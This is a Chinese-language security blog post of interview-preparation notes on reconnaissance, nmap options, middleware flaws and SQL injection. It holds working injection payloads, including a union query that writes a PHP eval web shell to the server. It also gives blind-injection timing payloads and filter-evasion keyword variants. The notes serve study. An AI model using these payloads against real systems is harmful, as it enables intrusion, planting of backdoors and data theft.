<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="L2ksy0d">
    
    <title>
        
            信安面试问题准备 |
        
        L2ksy0d&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/logo.svg">
    
<link rel="stylesheet" href="/css/font-awesome.min.css">

    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"en","path":"search.json"};
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":false,"init_open":false},"style":{"primary_color":"#0066CC","avatar":"/images/avatar.jpg","favicon":"/images/logo.svg","article_img_align":"left","left_side_width":"260px","content_max_width":"920px","hover":{"shadow":false,"scale":false},"first_screen":{"enable":true,"background_img":"/images/bg.svg","description":"纵使桑田成沧海，依然热爱。"},"scroll":{"progress_bar":{"enable":true},"percent":{"enable":false}}},"local_search":{"enable":true,"preload":false},"code_copy":{"enable":true,"style":"default"},"pjax":{"enable":false},"lazyload":{"enable":true},"version":"3.4.5"};
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
  </script>
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                L2ksy0d&#39;s Blog
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                HOME
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                ARCHIVES
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                LINKS
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">HOME</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">ARCHIVES</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">LINKS</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">信安面试问题准备</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/avatar.jpg">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">L2ksy0d</span>
                        
                            <span class="author-label">SpecialRain Team</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fas fa-edit"></i>&nbsp;
        <span class="pc">2022-03-25 00:00:00</span>
        <span class="mobile">2022-03-25 00:00</span>
    </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/%E9%9D%A2%E7%BB%8F/">面经</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <h1 id="面试问题准备"><a href="#面试问题准备" class="headerlink" title="面试问题准备"></a>面试问题准备</h1><p>收集一些常见的信息安全面试问题</p>
<span id="more"></span>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="假如给你一个网站你怎么去渗透"><a href="#假如给你一个网站你怎么去渗透" class="headerlink" title="假如给你一个网站你怎么去渗透"></a>假如给你一个网站你怎么去渗透</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">信息收集</span><br><span class="line"></span><br><span class="line">首先看是什么类型的网站，针对不同类型的网站有不同的信息搜集方案，如大型企业网站可以用天眼查，启信宝等查询法人股份等信息，小型网站可以查询使用了哪类建站系统</span><br><span class="line"></span><br><span class="line">1.whois查詢,获取注册者邮箱姓名电话等。</span><br><span class="line"></span><br><span class="line">2.查询服务器旁站以及子域名站点，因为主站一般比较难，所以先看看旁站有没有通用性的cms或者其他漏洞。</span><br><span class="line"></span><br><span class="line">3.查看服务器操作系统版本，web中间件，看看是否存在已知的漏洞，比如IIS，APACHE,NGINX的解析漏洞</span><br><span class="line"></span><br><span class="line">4.查看IP，进行IP地址端口扫描，对响应的端口进行漏洞探测，比如 rsync,訫脏滴血，mysql,ftp,ssh弱口令等。</span><br><span class="line"></span><br><span class="line">5.扫描网站目录结构，看看是否可以遍历目录，或者敏感文件泄漏，比如php探针</span><br><span class="line"></span><br><span class="line">6.google hack进一步探测网站的信息，后台，敏感文件</span><br><span class="line"></span><br><span class="line">7.查看这个网站都有哪些功能，针对不同的功能可以实现不同的漏洞利用</span><br></pre></td></tr></table></figure>

<h3 id="whois查詢主要查的是什么"><a href="#whois查詢主要查的是什么" class="headerlink" title="whois查詢主要查的是什么?"></a>whois查詢主要查的是什么?</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">1.域名信息</span><br><span class="line">2.注册商</span><br><span class="line">3.联系人</span><br><span class="line">4.联系邮箱</span><br><span class="line">5.网站创建时间</span><br><span class="line">6.网站过期时间</span><br><span class="line">7.DNS信息</span><br><span class="line">8.网站状态</span><br><span class="line">拓展：什么是whois？</span><br><span class="line">whois可以理解为域名数据库搜索引擎</span><br></pre></td></tr></table></figure>



<h3 id="nmap命令"><a href="#nmap命令" class="headerlink" title="nmap命令"></a>nmap命令</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">-p 加端口号或1-65535</span><br><span class="line">-sS (TCP SYN扫描)</span><br><span class="line">-sT (TCP connect()扫描)</span><br><span class="line">-sU (UDP扫描)</span><br><span class="line">-sV (版本探测)</span><br><span class="line">-O (启用操作系统检测)</span><br><span class="line">-f (报文分段); --mtu (使用指定的MTU)</span><br><span class="line">-D &lt;decoy1 ，decoy2，...&gt; (使用诱饵隐蔽扫描)</span><br><span class="line">-S &lt;IP_Address&gt; (源地址哄骗)</span><br></pre></td></tr></table></figure>



<h3 id="常见的web容器"><a href="#常见的web容器" class="headerlink" title="常见的web容器"></a>常见的web容器</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">WebLogic</span><br><span class="line">WebSphere</span><br><span class="line">JBoss</span><br><span class="line">Tomcat</span><br><span class="line">IIS</span><br><span class="line">Apache</span><br><span class="line">Nginx</span><br></pre></td></tr></table></figure>



<h3 id="常见中间件漏洞"><a href="#常见中间件漏洞" class="headerlink" title="常见中间件漏洞"></a>常见中间件漏洞</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">1.IIS</span><br><span class="line">    1、PUT 漏洞</span><br><span class="line">    2、短文件名猜解</span><br><span class="line">    3、远程代码执行</span><br><span class="line">    4、解析漏洞</span><br><span class="line">2.Apache</span><br><span class="line">    1、解析漏洞</span><br><span class="line">    2、目录遍历</span><br><span class="line">3.Nginx</span><br><span class="line">    1、文件解析</span><br><span class="line">    2、目录遍历</span><br><span class="line">    3、CRLF 注入</span><br><span class="line">    4、目录穿越</span><br><span class="line">4.Tomcat</span><br><span class="line">    1、远程代码执行</span><br><span class="line">    2、war 后门文件部署</span><br><span class="line">5.jBoss</span><br><span class="line">    1、反序列化漏洞</span><br><span class="line">    2、war 后门文件部署</span><br><span class="line">6.WebLogic</span><br><span class="line">    1、反序列化漏洞</span><br><span class="line">    2、SSRF</span><br><span class="line">    3、任意文件上传</span><br><span class="line">    4、war 后门文件部署</span><br><span class="line">7.其它中间件相关漏洞</span><br><span class="line">    1、FastCGI 未授权访问、任意命令执行</span><br><span class="line">    2、PHPCGI 远程代码执行</span><br></pre></td></tr></table></figure>

<h3 id="常见端口及对应服务"><a href="#常见端口及对应服务" class="headerlink" title="常见端口及对应服务"></a>常见端口及对应服务</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h2><h3 id="SQL和NoSQL的优缺点"><a href="#SQL和NoSQL的优缺点" class="headerlink" title="SQL和NoSQL的优缺点"></a>SQL和NoSQL的优缺点</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SQL 优点：结构稳定、逻辑性强、易于理解</span><br><span class="line">SQL 缺点：不适于高并发、不适于海量数据高效读写、维护开销大、相对 nosql 速度慢</span><br><span class="line">NoSql 优点：易扩展、数据结构灵活、查询速度快</span><br><span class="line">比较：没有好坏之分，只看应用环境。关系型数据库可靠性更强、适用于银行等数据精度要求高的环境。非关系型数据库适用于高并发、大量数据库交互、数据准确度不高的环境。</span><br></pre></td></tr></table></figure>



<h3 id="常见数据库端口"><a href="#常见数据库端口" class="headerlink" title="常见数据库端口"></a>常见数据库端口</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">关系型：</span><br><span class="line">	mysql:3306</span><br><span class="line">	sqlserver:1433</span><br><span class="line">	orecal:1521</span><br><span class="line">	PostgreSQL:5432</span><br><span class="line">	db2:50000</span><br><span class="line">非关系型：</span><br><span class="line">	MongoDB:27017</span><br><span class="line">	redis:6379</span><br><span class="line">	memcached:11211</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="SQL注入的分类"><a href="#SQL注入的分类" class="headerlink" title="SQL注入的分类"></a>SQL注入的分类</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">从注入参数类型分：</span><br><span class="line">	数字型注入</span><br><span class="line">	字符型注入</span><br><span class="line">	搜索型注入</span><br><span class="line">从注入方法分：</span><br><span class="line">	基于报错</span><br><span class="line">	基于布尔盲注</span><br><span class="line">	基于时间盲注</span><br><span class="line">	联合查询</span><br><span class="line">	堆叠注入</span><br><span class="line">	宽字节注入</span><br><span class="line">从提交方式分：</span><br><span class="line">	GET注入</span><br><span class="line">	POST注入</span><br><span class="line">	COOKIE注入</span><br><span class="line">	HTTP头注入</span><br></pre></td></tr></table></figure>

<h3 id="load-file判断是否有读写权限"><a href="#load-file判断是否有读写权限" class="headerlink" title="load_file判断是否有读写权限"></a>load_file判断是否有读写权限</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> (<span class="keyword">select</span> <span class="built_in">count</span>(<span class="operator">*</span>) <span class="keyword">from</span> mysql.user)<span class="operator">&gt;</span><span class="number">0</span><span class="comment">/* 如果结果返回正常,说明具有读写权限。</span></span><br><span class="line"><span class="comment">and (select count(*) from mysql.user)&gt;0/* 返回错误，应该是管理员给数据库帐户降权</span></span><br></pre></td></tr></table></figure>

<h3 id="mysql5-0上下有什么区别"><a href="#mysql5-0上下有什么区别" class="headerlink" title="mysql5.0上下有什么区别"></a>mysql5.0上下有什么区别</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql5.0以下版本没有information_schema这个系统库，无法列出表名列名，只能暴力跑</span><br></pre></td></tr></table></figure>

<h3 id="MySQL中-和-的区别"><a href="#MySQL中-和-的区别" class="headerlink" title="MySQL中@和@@的区别"></a>MySQL中@和@@的区别</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">一个@是用户自定义变量</span><br><span class="line">两个@是系统变量，如@@version、@@user</span><br></pre></td></tr></table></figure>

<h3 id="MySQL绕过常用函数"><a href="#MySQL绕过常用函数" class="headerlink" title="MySQL绕过常用函数"></a>MySQL绕过常用函数</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">group_concat() ==&gt; concat_ws()</span><br><span class="line">sleep() ==&gt; benchmark()</span><br><span class="line">mid()、substr() ==&gt; substring()</span><br><span class="line">user() ==&gt; @@user</span><br><span class="line">updatexml() ==&gt; extractvalue()</span><br></pre></td></tr></table></figure>

<h3 id="SQL注入的危害和修复"><a href="#SQL注入的危害和修复" class="headerlink" title="SQL注入的危害和修复"></a>SQL注入的危害和修复</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">造成敏感信息泄漏，攻击者可以对表数据进行操作。如果有写权限，可以写入木马，可能被getshell。或者被提权</span><br><span class="line"></span><br><span class="line">修复方案：</span><br><span class="line">  sql语句预编译</span><br><span class="line">  对输入内容进行转义</span><br><span class="line">  使用安全函数</span><br></pre></td></tr></table></figure>



<h3 id="SQL注入写入webshell的条件和方式"><a href="#SQL注入写入webshell的条件和方式" class="headerlink" title="SQL注入写入webshell的条件和方式"></a>SQL注入写入webshell的条件和方式</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">条件：</span><br><span class="line">	要知道网站绝对路径，可以通过报错，phpinfo界面，404界面等一些方式知道</span><br><span class="line">	gpc没有开启，开启了单引号被转义了，语句就不能正常执行了</span><br><span class="line">	要有file权限，默认情况下只有root有</span><br><span class="line">	对目录要有写权限，一般image之类的存放突破的目录就有</span><br><span class="line">	</span><br><span class="line">方式：</span><br><span class="line">	1；union写入</span><br><span class="line">		union select into outfile，将一句话写入shell.php，仅适用于联合注入</span><br><span class="line">		具体权限要求：secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径。</span><br><span class="line">		?id=1 union select 1,&quot;&lt;?php @eval($_POST[&#x27;g&#x27;]);?&gt;&quot;,3 into outfile &#x27;E:/study/WWW/evil.php&#x27;</span><br><span class="line">	2.分隔符写入</span><br><span class="line">		当Mysql注入点为盲注或报错，Union select写入的方式显然是利用不了的，那么可以通过分隔符写入。SQLMAP的 --os-shell命令，所采用的就是一下这种方式</span><br><span class="line">		具体权限要求：secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径。</span><br><span class="line">		?id=1 INTO OUTFILE &#x27;物理路径&#x27; lines terminated by  （一句话hex编码）#</span><br><span class="line">		?id=1 INTO OUTFILE &#x27;物理路径&#x27; fields terminated by （一句话hex编码）#</span><br><span class="line">		?id=1 INTO OUTFILE &#x27;物理路径&#x27; columns terminated by （一句话hex编码）#</span><br><span class="line">		?id=1 INTO OUTFILE &#x27;物理路径&#x27; lines starting by    （一句话hex编码）#</span><br><span class="line">	3.log写入</span><br><span class="line">		新版本的MySQL设置了导出文件的路径，很难在获取Webshell过程中去修改配置文件，无法通过使用select into outfile来写入一句话。这时，我们可以通过修改MySQL的log文件来获取Webshell。</span><br><span class="line">		具体权限要求：数据库用户需具备Super和File服务器权限、获取物理路径。</span><br></pre></td></tr></table></figure>

<h3 id="sql注入过滤了逗号"><a href="#sql注入过滤了逗号" class="headerlink" title="sql注入过滤了逗号"></a>sql注入过滤了逗号</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*1.join绕过*/</span></span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> ((<span class="keyword">select</span> <span class="number">1</span>)A <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">2</span>)B <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">3</span>)C <span class="keyword">join</span> (<span class="keyword">select</span> group_concat(<span class="keyword">user</span>(),<span class="string">&#x27; &#x27;</span>,database(),<span class="string">&#x27; &#x27;</span>,@<span class="variable">@datadir</span>))D);</span><br><span class="line"></span><br><span class="line"><span class="comment">/*2.对于mid()和substr()函数，可以使用from for*/</span></span><br><span class="line"><span class="keyword">select</span> substr(database() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>);</span><br><span class="line"><span class="keyword">select</span> mid(database() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">/*3.对于limit可以用offset*/</span></span><br><span class="line">limit <span class="number">0</span>,<span class="number">1</span> <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span> limit <span class="number">1</span> <span class="keyword">offset</span> <span class="number">0</span></span><br></pre></td></tr></table></figure>

<h3 id="sleep被禁用后还能怎么进行sql注入（延时函数都有哪些？）"><a href="#sleep被禁用后还能怎么进行sql注入（延时函数都有哪些？）" class="headerlink" title="sleep被禁用后还能怎么进行sql注入（延时函数都有哪些？）"></a>sleep被禁用后还能怎么进行sql注入（延时函数都有哪些？）</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*1.benchmark代替sleep*/</span></span><br><span class="line">id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> if(ascii(<span class="built_in">substring</span>((database()),<span class="number">1</span>,<span class="number">1</span>))<span class="operator">=</span><span class="number">115</span>,(<span class="keyword">select</span> benchmark(<span class="number">10000000</span>,md5(<span class="number">0x41</span>))),<span class="number">1</span>) <span class="comment">--+</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/*2.笛卡尔积盲注*/</span></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> ctf_test <span class="keyword">where</span> <span class="keyword">user</span><span class="operator">=</span><span class="string">&#x27;1&#x27;</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> (<span class="keyword">SELECT</span> <span class="built_in">count</span>(<span class="operator">*</span>) <span class="keyword">FROM</span> information_schema.columns A, information_schema.columns B, information_schema.tables C)</span><br><span class="line"></span><br><span class="line"><span class="comment">/*3.RLIKE盲注*/</span></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> flag <span class="keyword">where</span> flag<span class="operator">=</span><span class="string">&#x27;1&#x27;</span> <span class="keyword">and</span> if(mid(<span class="keyword">user</span>(),<span class="number">1</span>,<span class="number">1</span>)<span class="operator">=</span><span class="string">&#x27;r&#x27;</span>,concat(rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>),rpad(<span class="number">1</span>,<span class="number">999999</span>,<span class="string">&#x27;a&#x27;</span>)) RLIKE <span class="string">&#x27;(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+cd&#x27;</span>,<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<h3 id="Select被过滤怎么办"><a href="#Select被过滤怎么办" class="headerlink" title="Select被过滤怎么办"></a>Select被过滤怎么办</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">sel&lt;&gt;ect</span><br><span class="line">sele/**/ct</span><br><span class="line">/*!%53eLEct*/</span><br><span class="line">se%0blect</span><br><span class="line">REVERSE(tceles)</span><br><span class="line">%53eLEct</span><br></pre></td></tr></table></figure>

<h3 id="盲注关键的表被过滤了，该怎么办"><a href="#盲注关键的表被过滤了，该怎么办" class="headerlink" title="盲注关键的表被过滤了，该怎么办"></a><font color='green'>盲注关键的表被过滤了，该怎么办</font></h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">如果关键的表被禁用了，可以使用这种形式</span><br><span class="line"><span class="keyword">select</span> <span class="built_in">count</span>(<span class="operator">*</span>) <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="keyword">null</span> <span class="keyword">union</span></span><br><span class="line"><span class="keyword">select</span> <span class="operator">!</span><span class="number">1</span>) <span class="keyword">group</span> <span class="keyword">by</span> concat(version(),<span class="built_in">floor</span>(rand(<span class="number">0</span>)<span class="operator">*</span><span class="number">2</span>))</span><br><span class="line"></span><br><span class="line">如果 rand 被禁用了可以使用用户变量来报错</span><br><span class="line"><span class="keyword">select</span> <span class="built_in">min</span>(<span class="variable">@a</span>:<span class="operator">=</span><span class="number">1</span>) <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> concat(passwo</span><br><span class="line">rd,<span class="variable">@a</span>:<span class="operator">=</span>(<span class="variable">@a</span><span class="operator">+</span><span class="number">1</span>)<span class="operator">%</span><span class="number">2</span>)</span><br></pre></td></tr></table></figure>

<h3 id="sql注入常见的过WAF方法"><a href="#sql注入常见的过WAF方法" class="headerlink" title="sql注入常见的过WAF方法"></a><strong>sql注入常见的过WAF方法</strong></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">内联注释绕过</span><br><span class="line">填充大量脏数据绕过</span><br><span class="line">垃圾参数填充绕过</span><br><span class="line">改变提交方式绕过,如GET方式变为POST方式提交</span><br><span class="line">随机agent头绕过</span><br><span class="line">fuzz过滤函数</span><br><span class="line">函数替换绕过</span><br></pre></td></tr></table></figure>

<h3 id="Mysql-UDF提权"><a href="#Mysql-UDF提权" class="headerlink" title="Mysql UDF提权"></a>Mysql UDF提权</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">原理：</span><br><span class="line">  UDF（user defined function）用户自定义函数，是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能，其添加的新函数都可以在sql语句中调用，就像调用本机函数一样。</span><br><span class="line">  </span><br><span class="line">条件：</span><br><span class="line">  如果mysql版本大于5.1，udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/</span><br><span class="line">  如果mysql版本小于5.1， udf.dll文件在windows server 2003下放置于c:\windows\system32目   录，在windows server 2000下放置在c:\winnt\system32目录。</span><br><span class="line">  掌握mysql数据库的账户，从拥有对mysql的insert和delete权限，以创建和抛弃函数。</span><br><span class="line">  拥有可以将udf.dll写入相应目录的权限。</span><br></pre></td></tr></table></figure>

<h3 id="SQL注入如何判断不同数据库"><a href="#SQL注入如何判断不同数据库" class="headerlink" title="SQL注入如何判断不同数据库"></a>SQL注入如何判断不同数据库</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">1.注释符判断</span><br><span class="line">/是 MySQL 中的注释符，返回错误说明该注入点不是 MySQL；</span><br><span class="line">继续提交如下查询字符：–是 Oracle 和 MSSQL 支持的注释符，如果返回正常，则说</span><br><span class="line">明为这两种数据库类型之一。</span><br><span class="line">继续提交如下查询字符：;是子句查询标识符，Oracle 不支持多行查询，因此如果返回</span><br><span class="line">错误，则说明很可能是 Oracle 数据库。</span><br><span class="line">2.函数判断</span><br><span class="line">and (select count()from MSysAccessObjects)&gt;0 access 数据库</span><br><span class="line">and (select count()from sysobjects)&gt;0 返回正常说明是 mssql 数据库</span><br><span class="line">and length(user())&gt;10 返回正常说明是 Mysql</span><br><span class="line">Oracle 可以根据 from dual 虚拟库判断</span><br><span class="line">3.根据语言和中间件常识</span><br><span class="line">Asp 和.net 通常使用 sqlserver</span><br><span class="line">Php 通常使用 mysql 或者 postgresql</span><br><span class="line">Java 通常是 oracle 或 mysql</span><br><span class="line">IIS 服务器是基于 windows 的架构，后台数据库有可能是 sqlserver</span><br><span class="line">Apache 服务器，可能使用开源数据库 mysql 或 postgresql</span><br></pre></td></tr></table></figure>
